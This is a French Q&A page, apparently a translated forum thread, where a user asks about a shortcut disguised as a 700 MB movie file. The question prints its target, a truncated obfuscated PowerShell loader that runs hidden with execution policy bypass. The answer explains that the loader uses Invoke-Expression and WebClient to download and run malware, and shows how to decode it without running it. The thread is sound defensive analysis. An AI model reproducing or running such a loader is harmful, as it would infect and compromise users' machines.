web-dev-qa-db-fra.com

Qu'est-ce que ce lien fait spécifiquement ou s'agit-il d'un virus?

Dans Windows 10, j'ai téléchargé ce fichier que je pensais être un film, mais un raccourci de 700 Mo

Je vois que la cible est la suivante

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoPr -WINd 1 -eXEc ByP. ($ pshOmE [4] + $ PShoMe [30] + 'X') (-JoiN ((44, 141, 163, 160, 170, 40, 75, 40, 50, 50, 116, 145, 167, 55, 117) 142, 152, 145, 143, 164, 40, 123, 171, 163, 164, 145, 155, 56, 116

Et il était prévu de commencer à

% SYSTEMROOT%\System32\WindowsPowerShell\v1.0

Qu'est ce que ça fait?

6
Erik

C'est un chargeur de malware.

Il exécute un code powershell commençant par New-Object System.N... (masqué dans les numéros), dont le contenu intégral est New-Object System.Net.WebClient, et qui sera utilisé pour télécharger et exécuter le programme malveillant à partir de l'URL, lequel est également masqué dans les numéros ultérieurs du code obfusqué.

Si vous avez déjà cliqué sur le lien, vous êtes probablement déjà infecté, à moins que l'URL ait déjà été supprimée.

Vous pouvez essayer de coller votre ligne dans le bloc-notes, puis tout effacer avant ( -JoiN( (, copier la partie restante (commençant par ( -JoiN( (...) et la coller dans la fenêtre PowerShell. Il divulguera le code PowerShell masqué qui serait normalement exécuté par le code précédent $pshOmE[4]+$PShoMe[30]+'X') = iex = Invoke-Expression .

9